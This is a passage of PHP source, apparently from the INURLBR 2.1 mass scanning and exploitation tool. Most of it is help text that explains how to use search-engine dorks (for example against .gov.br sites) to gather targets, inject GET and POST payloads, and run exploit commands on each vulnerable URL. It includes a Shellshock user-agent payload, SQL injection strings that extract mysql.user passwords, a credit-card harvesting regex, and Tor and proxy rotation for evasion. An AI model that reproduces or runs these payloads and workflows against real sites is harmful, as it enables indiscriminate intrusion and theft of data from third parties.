{$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}5{$_SESSION["c0"]}
Using more than one engine: {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}1,2,5,6,11,24{$_SESSION["c0"]}
Using all engines: {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}all{$_SESSION["c0"]}
{$_SESSION["c1"]}--proxy{$_SESSION["c0"]} Choose which proxy you want to use through the search engine:
Example: {$_SESSION["c1"]}--proxy {$_SESSION["c2"]}{proxy:port}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--proxy {$_SESSION["c2"]}localhost:8118{$_SESSION["c0"]}
{$_SESSION["c1"]}--proxy {$_SESSION["c2"]}socks5://googleinurl@localhost:9050{$_SESSION["c0"]}
{$_SESSION["c1"]}--proxy {$_SESSION["c2"]}http://admin:12334@172.16.0.90:8080{$_SESSION["c0"]}
{$_SESSION["c1"]}--proxy-file{$_SESSION["c0"]} Set font file to randomize your proxy to each search engine.
Example: {$_SESSION["c1"]}--proxy-file {$_SESSION["c2"]}{proxys}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--proxy-file {$_SESSION["c2"]}proxys_list.txt{$_SESSION["c0"]}
{$_SESSION["c1"]}--time-proxy{$_SESSION["c0"]} Set the time how often the proxy will be exchanged.
Example: {$_SESSION["c1"]}--time-proxy {$_SESSION["c2"]}{second}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--time-proxy {$_SESSION["c2"]}10{$_SESSION["c0"]}
{$_SESSION["c1"]}--proxy-http-file{$_SESSION["c0"]} Set file with urls http proxy,
are used to bular capch search engines
Example: {$_SESSION["c1"]}--proxy-http-file {$_SESSION["c2"]}{youfilehttp}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--proxy-http-file {$_SESSION["c2"]}http_proxys.txt{$_SESSION["c0"]}
{$_SESSION["c1"]}--tor-random{$_SESSION["c0"]} Enables the TOR function, each usage links an unique IP.
{$_SESSION["c1"]}-t{$_SESSION["c0"]} Choose the validation type: op {$_SESSION["c2"]}1, 2, 3, 4, 5{$_SESSION["c0"]}
[options]:
{$_SESSION["c2"]}1{$_SESSION["c0"]} - The first type uses default errors considering the script:
It establishes connection with the exploit through the get method.
Demo: www.alvo.com.br/pasta/index.php?id={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
{$_SESSION["c2"]}2{$_SESSION["c0"]} - The second type tries to valid the error defined by: {$_SESSION["c1"]}-a={$_SESSION["c2"]}'VALUE_INSIDE_THE _TARGET'{$_SESSION["c0"]}
It also establishes connection with the exploit through the get method
Demo: www.alvo.com.br/pasta/index.php?id={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
{$_SESSION["c2"]}3{$_SESSION["c0"]} - The third type combine both first and second types:
Then, of course, it also establishes connection with the exploit through the get method
Demo: www.target.com.br{$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
Default: {$_SESSION["c2"]}1{$_SESSION["c0"]}
Example: {$_SESSION["c1"]}-t {$_SESSION["c2"]}{op}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}-t {$_SESSION["c2"]}1{$_SESSION["c0"]}
{$_SESSION["c2"]}4{$_SESSION["c0"]} - The fourth type a validation based on source file and will be enabled scanner standard functions.
The source file their values are concatenated with target url.
- Set your target with command {$_SESSION["c1"]}--target {$_SESSION["c2"]}{http://target}{$_SESSION["c0"]}
- Set your file with command {$_SESSION["c1"]}-o {$_SESSION["c2"]}{file}{$_SESSION["c0"]}
Explicative:
Source file values:
/admin/index.php?id=
/pag/index.php?id=
/brazil.php?new=
Demo:
www.target.com.br/admin/index.php?id={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
www.target.com.br/pag/index.php?id={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
www.target.com.br/brazil.php?new={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
{$_SESSION["c2"]}5{$_SESSION["c0"]} - (FIND PAGE) The fifth type of validation based on the source file,
Will be enabled only one validation code 200 on the target server, or if the url submit such code will be considered vulnerable.
- Set your target with command {$_SESSION["c1"]}--target {$_SESSION["c2"]}{http://target}{$_SESSION["c0"]}
- Set your file with command {$_SESSION["c1"]}-o {$_SESSION["c2"]}{file}{$_SESSION["c0"]}
Explicative:
Source file values:
/admin/admin.php
/admin.asp
/admin.aspx
Demo:
www.target.com.br/admin/admin.php
www.target.com.br/admin.asp
www.target.com.br/admin.aspx
Observation: If it shows the code 200 will be separated in the output file
DEFAULT ERRORS:
{$_SESSION["c11"]}
[*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL, [*]ZEND FRAMEWORK,
[*]ERROR MARIADB, [*]ERROR MYSQL, [*]ERROR JBOSSWEB, [*]ERROR MICROSOFT,
[*]ERROR ODBC, [*]ERROR POSTGRESQL, [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,
[*]CMS WORDPRESS, [*]SHELL WEB, [*]ERROR JDBC, [*]ERROR ASP,
[*]ERROR ORACLE, [*]ERROR DB2, [*]JDBC CFM, [*]ERROS LUA,
[*]ERROR INDEFINITE
{$_SESSION["c0"]}
{$_SESSION["c1"]}--dork{$_SESSION["c0"]} Defines which dork the search engine will use.
Example: {$_SESSION["c1"]}--dork {$_SESSION["c2"]}{dork}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.gov.br inurl:php? id'{$_SESSION["c0"]}
- Using multiples dorks:
Example: {$_SESSION["c1"]}--dork {$_SESSION["c2"]}{[DORK]dork1[DORK]dork2[DORK]dork3}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'{$_SESSION["c0"]}
{$_SESSION["c1"]}--dork-file{$_SESSION["c0"]} Set font file with your search dorks.
Example: {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}{dork_file}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorks.txt'{$_SESSION["c0"]}
{$_SESSION["c1"]}--exploit-get{$_SESSION["c0"]} Defines which exploit will be injected through the GET method to each URL found.
Example: {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}{exploit_get}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?'´%270x27;\"{$_SESSION["c0"]}
{$_SESSION["c1"]}--exploit-post{$_SESSION["c0"]} Defines which exploit will be injected through the POST method to each URL found.
Example: {$_SESSION["c1"]}--exploit-post {$_SESSION["c3"]}{exploit_post}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--exploit-post {$_SESSION["c3"]}'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'{$_SESSION["c0"]}
{$_SESSION["c1"]}--exploit-command{$_SESSION["c0"]} Defines which exploit/parameter will be executed in the options: {$_SESSION["c1"]}--command-vul/{$_SESSION["c0"]} {$_SESSION["c1"]}--command-all{$_SESSION["c0"]}.
The exploit-command will be identified by the paramaters: {$_SESSION["c1"]}--command-vul/{$_SESSION["c0"]} {$_SESSION["c1"]}--command-all as {$_SESSION["c6"]}_EXPLOIT_{$_SESSION["c0"]}
Ex {$_SESSION["c1"]}--exploit-command {$_SESSION["c2"]}'/admin/config.conf' {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'curl -v {$_SESSION["c8"]}_TARGET_{$_SESSION["c6"]}_EXPLOIT_{$_SESSION["c2"]}'{$_SESSION["c0"]}
_TARGET_ is the specified URL/TARGET obtained by the process
_EXPLOIT_ is the exploit/parameter defined by the option {$_SESSION["c1"]}--exploit-command{$_SESSION["c0"]}.
Example: {$_SESSION["c1"]}--exploit-command {$_SESSION["c2"]}{exploit-command}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--exploit-command {$_SESSION["c2"]}'/admin/config.conf'{$_SESSION["c0"]}
{$_SESSION["c1"]}-a{$_SESSION["c0"]} Specify the string that will be used on the search script:
Example: {$_SESSION["c1"]}-a {$_SESSION["c2"]}{string}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}-a {$_SESSION["c2"]}'hello world'{$_SESSION["c0"]}
{$_SESSION["c1"]}-d{$_SESSION["c0"]} Specify the script usage op {$_SESSION["c2"]}1, 2, 3, 4, 5.{$_SESSION["c0"]}
Example: {$_SESSION["c1"]}-d {$_SESSION["c2"]}{op}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}-d {$_SESSION["c2"]}1 {$_SESSION["c0"]}/URL of the search engine.
{$_SESSION["c1"]}-d {$_SESSION["c2"]}2 {$_SESSION["c0"]}/Show all the url.
{$_SESSION["c1"]}-d {$_SESSION["c2"]}3 {$_SESSION["c0"]}/Detailed request of every URL.
{$_SESSION["c1"]}-d {$_SESSION["c2"]}4 {$_SESSION["c0"]}/Shows the HTML of every URL.
{$_SESSION["c1"]}-d {$_SESSION["c2"]}5 {$_SESSION["c0"]}/Detailed request of all URLs.
{$_SESSION["c1"]}-d {$_SESSION["c2"]}6 {$_SESSION["c0"]}/Detailed PING - PONG irc.
{$_SESSION["c1"]}-s{$_SESSION["c0"]} Specify the output file where it will be saved the vulnerable URLs.
Example: {$_SESSION["c1"]}-s {$_SESSION["c2"]}{file}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}-s {$_SESSION["c2"]}your_file.txt
{$_SESSION["c1"]}-o{$_SESSION["c0"]} Manually manage the vulnerable URLs you want to use from a file, without using a search engine.
Example: {$_SESSION["c1"]}-o {$_SESSION["c2"]}{file_where_my_urls_are}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}-o {$_SESSION["c2"]}tests.txt
{$_SESSION["c1"]}--persist{$_SESSION["c0"]} Attempts when Google blocks your search.
The script tries to another google host / default = 4
Example: {$_SESSION["c1"]}--persist {$_SESSION["c2"]}{number_attempts}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--persist {$_SESSION["c2"]}7
{$_SESSION["c1"]}--ifredirect{$_SESSION["c0"]} Return validation method post REDIRECT_URL
Example: {$_SESSION["c1"]}--ifredirect {$_SESSION["c2"]}{string_validation}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--ifredirect {$_SESSION["c2"]}'/admin/painel.php'
{$_SESSION["c1"]}-m{$_SESSION["c0"]} Enable the search for emails on the urls specified.
{$_SESSION["c1"]}-u{$_SESSION["c0"]} Enables the search for URL lists on the url specified.
{$_SESSION["c1"]}--gc{$_SESSION["c0"]} Enable validation of values with google webcache.
{$_SESSION["c1"]}--pr{$_SESSION["c0"]} Progressive scan, used to set operators (dorks),
makes the search of a dork and valid results, then goes a dork at a time.
{$_SESSION["c1"]}--file-cookie{$_SESSION["c0"]} Open cookie file.
{$_SESSION["c1"]}--save-as{$_SESSION["c0"]} Save results in a certain place.
{$_SESSION["c1"]}--shellshock{$_SESSION["c0"]} Explore shellshock vulnerability by setting a malicious user-agent.
{$_SESSION["c1"]}--popup{$_SESSION["c0"]} Run --command all or vuln in a parallel terminal.
{$_SESSION["c1"]}--cms-check{$_SESSION["c0"]} Enable simple check if the url / target is using CMS.
{$_SESSION["c1"]}--no-banner{$_SESSION["c0"]} Remove the script presentation banner.
{$_SESSION["c1"]}--unique{$_SESSION["c0"]} Filter results in unique domains.
{$_SESSION["c1"]}--beep{$_SESSION["c0"]} Beep sound when a vulnerability is found.
{$_SESSION["c1"]}--alexa-rank{$_SESSION["c0"]} Show alexa positioning in the results.
{$_SESSION["c1"]}--robots{$_SESSION["c0"]} Show values file robots.
{$_SESSION["c1"]}--range{$_SESSION["c0"]} Set range IP.
Example: {$_SESSION["c1"]}--range {$_SESSION["c2"]}{range_start,rage_end}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--range {$_SESSION["c2"]}'172.16.0.5#172.16.0.255'
{$_SESSION["c1"]}--range-rand{$_SESSION["c0"]} Set amount of random ips.
Example: {$_SESSION["c1"]}--range-rand {$_SESSION["c2"]}{rand}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--range-rand {$_SESSION["c2"]}'50'
{$_SESSION["c1"]}--irc{$_SESSION["c0"]} Sending vulnerable to IRC / server channel.
Example: {$_SESSION["c1"]}--irc {$_SESSION["c2"]}{server#channel}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--irc {$_SESSION["c2"]}'irc.rizon.net#inurlbrasil'
{$_SESSION["c1"]}--http-header{$_SESSION["c0"]} Set HTTP header.
Example: {$_SESSION["c1"]}--http-header {$_SESSION["c2"]}{youemail}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--http-header {$_SESSION["c2"]}'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm=\"Top Secret\"'
{$_SESSION["c1"]}--sedmail{$_SESSION["c0"]} Sending vulnerable to email.
Example: {$_SESSION["c1"]}--sedmail {$_SESSION["c2"]}{youemail}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--sedmail {$_SESSION["c2"]}youemail@inurl.com.br
{$_SESSION["c1"]}--delay{$_SESSION["c0"]} Delay between research processes.
Example: {$_SESSION["c1"]}--delay {$_SESSION["c2"]}{second}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--delay {$_SESSION["c2"]}10
{$_SESSION["c1"]}--time-out{$_SESSION["c0"]} Timeout to exit the process.
Example: {$_SESSION["c1"]}--time-out {$_SESSION["c2"]}{second}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--time-out {$_SESSION["c2"]}10
{$_SESSION["c1"]}--ifurl{$_SESSION["c0"]} Filter URLs based on their argument.
Example: {$_SESSION["c1"]}--ifurl {$_SESSION["c2"]}{ifurl}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--ifurl {$_SESSION["c2"]}index.php?id=
{$_SESSION["c1"]}--ifcode{$_SESSION["c0"]} Valid results based on your return http code.
Example: {$_SESSION["c1"]}--ifcode {$_SESSION["c2"]}{ifcode}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--ifcode {$_SESSION["c2"]}200
{$_SESSION["c1"]}--ifemail{$_SESSION["c0"]} Filter E-mails based on their argument.
Example: {$_SESSION["c1"]}--ifemail {$_SESSION["c2"]}{file_where_my_emails_are}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--ifemail {$_SESSION["c2"]}sp.gov.br
{$_SESSION["c1"]}--url-reference{$_SESSION["c0"]} Define referring URL in the request to send him against the target.
Example: {$_SESSION["c1"]}--url-reference {$_SESSION["c2"]}{url}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--url-reference {$_SESSION["c2"]}http://target.com/admin/user/valid.php
{$_SESSION["c1"]}--mp{$_SESSION["c0"]} Limits the number of pages in the search engines.
Example: {$_SESSION["c1"]}--mp {$_SESSION["c2"]}{limit}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--mp {$_SESSION["c2"]}50
{$_SESSION["c1"]}--user-agent{$_SESSION["c0"]} Define the user agent used in its request against the target.
Example: {$_SESSION["c1"]}--user-agent {$_SESSION["c2"]}{agent}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--user-agent {$_SESSION["c2"]}'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'
Usage-exploit / SHELLSHOCK:
{$_SESSION["c1"]}--user-agent {$_SESSION["c2"]}'() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;\"'
Complete command:
php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t 2 -a '99887766555'
{$_SESSION["c1"]}--sall{$_SESSION["c0"]} Saves all urls found by the scanner.
Example: {$_SESSION["c1"]}--sall {$_SESSION["c2"]}{file}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--sall {$_SESSION["c2"]}your_file.txt
{$_SESSION["c1"]}--command-vul{$_SESSION["c0"]} Every vulnerable URL found will execute this command parameters.
Example: {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]}{$_SESSION["c2"]}'{$_SESSION["c0"]}
{$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'./exploit.sh {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} {$_SESSION["c2"]}output.txt'{$_SESSION["c0"]}
{$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'php miniexploit.php -t {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]} -s output.txt'{$_SESSION["c0"]}
{$_SESSION["c1"]}--command-all{$_SESSION["c0"]} Use this commmand to specify a single command to EVERY URL found.
Example: {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]}{$_SESSION["c2"]}'{$_SESSION["c0"]}
{$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'./exploit.sh {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} {$_SESSION["c2"]}output.txt'{$_SESSION["c0"]}
{$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'php miniexploit.php -t {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]} -s output.txt'{$_SESSION["c0"]}
[!] Observation:
{$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} will be replaced by the URL/target found, although if the user
doesn't input the get, only the domain will be executed.
{$_SESSION["c14"]}_TARGETFULL_{$_SESSION["c0"]} will be replaced by the original URL / target found.
{$_SESSION["c14"]}_TARGETXPL_{$_SESSION["c0"]} will be replaced by the original URL / target found + EXPLOIT --exploit-get.
{$_SESSION["c9"]}_TARGETIP_{$_SESSION["c0"]} return of ip URL / target found.
{$_SESSION["c8"]}_URI_{$_SESSION["c0"]} Back URL set of folders / target found.
{$_SESSION["c15"]}_RANDOM_{$_SESSION["c0"]} Random strings.
{$_SESSION["c9"]}_PORT_{$_SESSION["c0"]} Capture port of the current test, within the --port-scan process.
{$_SESSION["c6"]}_EXPLOIT_{$_SESSION["c0"]} will be replaced by the specified command argument {$_SESSION["c1"]}--exploit-command{$_SESSION["c0"]}.
The exploit-command will be identified by the parameters {$_SESSION["c1"]}--command-vul/{$_SESSION["c0"]} {$_SESSION["c1"]}--command-all as {$_SESSION["c6"]}_EXPLOIT_{$_SESSION["c0"]}
{$_SESSION["c1"]}--replace{$_SESSION["c0"]} Replace values in the target URL.
Example: {$_SESSION["c1"]}--replace {$_SESSION["c2"]}{value_old[INURL]value_new}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--replace {$_SESSION["c2"]}'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'{$_SESSION["c0"]}
{$_SESSION["c1"]}--replace {$_SESSION["c2"]}'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'{$_SESSION["c0"]}
{$_SESSION["c1"]}--replace {$_SESSION["c2"]}'index.aspx?id=[INURL]index.aspx?id=1%27´'{$_SESSION["c0"]}
{$_SESSION["c1"]}--remove{$_SESSION["c0"]} Remove values in the target URL.
Example: {$_SESSION["c1"]}--remove {$_SESSION["c2"]}{string}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--remove {$_SESSION["c2"]}'/admin.php?id=0'
{$_SESSION["c1"]}--regexp{$_SESSION["c0"]} Using regular expression to validate his research, the value of the
Expression will be sought within the target/URL.
Example: {$_SESSION["c1"]}--regexp{$_SESSION["c2"]} {regular_expression}{$_SESSION["c0"]}
All Major Credit Cards:
Usage: {$_SESSION["c1"]}--regexp{$_SESSION["c2"]} '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'{$_SESSION["c0"]}
IP Addresses:
Usage: {$_SESSION["c1"]}--regexp{$_SESSION["c2"]} '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'{$_SESSION["c0"]}
EMAIL:
Usage: {$_SESSION["c1"]}--regexp{$_SESSION["c2"]} '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'{$_SESSION["c0"]}
{$_SESSION["c1"]}---regexp-filter{$_SESSION["c0"]} Using regular expression to filter his research, the value of the
Expression will be sought within the target/URL.
Example: {$_SESSION["c1"]}---regexp-filter{$_SESSION["c2"]} {regular_expression}{$_SESSION["c0"]}
EMAIL:
Usage: {$_SESSION["c1"]}---regexp-filter{$_SESSION["c2"]} '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'{$_SESSION["c0"]}
[!] Small commands manager:
{$_SESSION["c1"]}--exploit-cad{$_SESSION["c0"]} Command register for use within the scanner.
Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}
Example Format: NMAP::nmap -sV _TARGET_
Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt
Usage: {$_SESSION["c1"]}--exploit-cad{$_SESSION["c2"]} 'NMAP::nmap -sV _TARGET_'{$_SESSION["c0"]}
Observation: Each registered command is identified by an id of your array.
Commands are logged in exploits.conf file.
{$_SESSION["c1"]}--exploit-all-id{$_SESSION["c0"]} Execute commands, exploits based on id of use,
(all) is run for each target found by the engine.
Example: {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]}{id,id}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--exploit-all-id {$_SESSION["c2"]}1,2,8,22
{$_SESSION["c1"]}--exploit-vul-id{$_SESSION["c0"]} Execute commands, exploits based on id of use,
(vull) run command only if the target was considered vulnerable.
Example: {$_SESSION["c1"]}--exploit-vul-id {$_SESSION["c2"]}{id,id}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--exploit-vul-id {$_SESSION["c2"]}1,2,8,22
{$_SESSION["c1"]}--exploit-list{$_SESSION["c0"]} List all entries command in exploits.conf file.
[!] Running subprocesses:
{$_SESSION["c1"]}--sub-file{$_SESSION["c0"]} Subprocess performs an injection
strings in URLs found by the engine, via GET or POST.
Example: {$_SESSION["c1"]}--sub-file {$_SESSION["c2"]}{youfile}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--sub-file {$_SESSION["c2"]}exploits_get.txt
{$_SESSION["c1"]}--sub-get{$_SESSION["c0"]} defines whether the strings coming from
--sub-file will be injected via GET.
Usage: {$_SESSION["c1"]}--sub-get
{$_SESSION["c1"]}--sub-post{$_SESSION["c0"]} defines whether the strings coming from
--sub-file will be injected via POST.
Usage: {$_SESSION["c1"]}--sub-get
{$_SESSION["c1"]}--sub-concat{$_SESSION["c0"]} Sets string to be concatenated with
the target host within the subprocess
Example: {$_SESSION["c1"]}--sub-concat {$_SESSION["c2"]}{string}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--sub-concat {$_SESSION["c2"]}'/login.php'{$_SESSION["c0"]}
{$_SESSION["c1"]}--sub-cmd-vul{$_SESSION["c0"]} Each vulnerable URL found within the sub-process
will execute the parameters of this command.
Example: {$_SESSION["c1"]}--sub-cmd-vul {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--sub-cmd-vul {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]}{$_SESSION["c2"]}'{$_SESSION["c0"]}
{$_SESSION["c1"]}--sub-cmd-vul {$_SESSION["c2"]}'./exploit.sh {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} {$_SESSION["c2"]}output.txt'{$_SESSION["c0"]}
{$_SESSION["c1"]}--sub-cmd-vul {$_SESSION["c2"]}'php miniexploit.php -t {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]} -s output.txt'{$_SESSION["c0"]}
{$_SESSION["c1"]}--sub-cmd-all{$_SESSION["c0"]} Run command to each target found within the sub-process scope.
Example: {$_SESSION["c1"]}--sub-cmd-all {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--sub-cmd-all {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]}{$_SESSION["c2"]}'{$_SESSION["c0"]}
{$_SESSION["c1"]}--sub-cmd-all {$_SESSION["c2"]}'./exploit.sh {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} {$_SESSION["c2"]}output.txt'{$_SESSION["c0"]}
{$_SESSION["c1"]}--sub-cmd-all {$_SESSION["c2"]}'php miniexploit.php -t {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]} -s output.txt'{$_SESSION["c0"]}
{$_SESSION["c1"]}--port-scan{$_SESSION["c0"]} Defines ports that will be validated as open.
Example: {$_SESSION["c1"]}--port-scan {$_SESSION["c2"]}{ports}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--port-scan {$_SESSION["c2"]}'22,21,23,3306'{$_SESSION["c0"]}
{$_SESSION["c1"]}--port-cmd{$_SESSION["c0"]} Define command that runs when finding an open door.
Example: {$_SESSION["c1"]}--port-cmd {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--port-cmd {$_SESSION["c2"]}'./xpl _TARGETIP_:_PORT_'{$_SESSION["c0"]}
{$_SESSION["c1"]}--port-cmd {$_SESSION["c2"]}'./xpl _TARGETIP_/file.php?sqli=1'{$_SESSION["c0"]}
{$_SESSION["c1"]}--port-write{$_SESSION["c0"]} Send values for door.
Example: {$_SESSION["c1"]}--port-write {$_SESSION["c2"]}{'value0','value1','value3'}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--port-write {$_SESSION["c2"]}\"'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'\"{$_SESSION["c0"]}
[!] Modifying values used within script parameters:
{$_SESSION["c1"]}md5{$_SESSION["c0"]} Encrypt values in md5.
Example: {$_SESSION["c1"]}md5({$_SESSION["c2"]}{value}{$_SESSION["c1"]}){$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}md5({$_SESSION["c2"]}102030{$_SESSION["c1"]}){$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--exploit-get 'user?id=md5({$_SESSION["c2"]}102030{$_SESSION["c1"]})'{$_SESSION["c0"]}
{$_SESSION["c1"]}base64{$_SESSION["c0"]} Encrypt values in base64.
Example: {$_SESSION["c1"]}base64({$_SESSION["c2"]}{value}{$_SESSION["c1"]}){$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}base64({$_SESSION["c2"]}102030{$_SESSION["c1"]}){$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--exploit-get 'user?id=base64({$_SESSION["c2"]}102030{$_SESSION["c1"]})'{$_SESSION["c0"]}
{$_SESSION["c1"]}hex{$_SESSION["c0"]} Encrypt values in hex.
Example: {$_SESSION["c1"]}hex({$_SESSION["c2"]}{value}{$_SESSION["c1"]}){$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}hex({$_SESSION["c2"]}102030{$_SESSION["c1"]}){$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--exploit-get 'user?id=hex({$_SESSION["c2"]}102030{$_SESSION["c1"]})'{$_SESSION["c0"]}
{$_SESSION["c1"]}hex{$_SESSION["c0"]} Generate random values.
Example: {$_SESSION["c1"]}random({$_SESSION["c2"]}{character_counter}{$_SESSION["c1"]}){$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}random({$_SESSION["c2"]}8{$_SESSION["c1"]}){$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}--exploit-get 'user?id=random({$_SESSION["c2"]}8{$_SESSION["c1"]})'{$_SESSION["c0"]}
");
}
function __info() {
return system("command clear") . __getOut("
{$_SESSION["c1"]}_____ _ _ ______ ____
|_ _| \ | | ____/ __ \
| | | \| | |__ | | | |
| | | . ` | __|| | | |
_| |_| |\ | | | |__| |
|_____|_| \_|_| \____/
{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}Current PHP version=>{$_SESSION["c1"]}[ " . phpversion() . "{$_SESSION["c0"]} ]
{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}Current script owner=>{$_SESSION["c1"]}[ " . get_current_user() . "{$_SESSION["c0"]} ]
{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}Current uname=>{$_SESSION["c1"]}[ " . php_uname() . "{$_SESSION["c0"]} ]
{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}Current pwd=>{$_SESSION["c1"]}[ " . getcwd() . "{$_SESSION["c0"]} ]
{$_SESSION["c1"]}[-]-------------------------------------------------------------------------------{$_SESSION["c0"]}
{$_SESSION["c1"]}[*]{$_SESSION["c0"]}GRUPO INURL BRASIL - PESQUISA AVANÇADA.
{$_SESSION["c1"]}[*]{$_SESSION["c0"]}SCRIPT NAME: INURLBR 2.1
{$_SESSION["c1"]}[*]{$_SESSION["c0"]}AUTOR: Cleiton Pinheiro
{$_SESSION["c1"]}[*]{$_SESSION["c0"]}Nick: Googleinurl
{$_SESSION["c1"]}[*]{$_SESSION["c0"]}Email: inurlbr@gmail.com
{$_SESSION["c1"]}[*]{$_SESSION["c0"]}Blog: http://blog.inurl.com.br
{$_SESSION["c1"]}[*]{$_SESSION["c0"]}Twitter: https://twitter.com/googleinurl
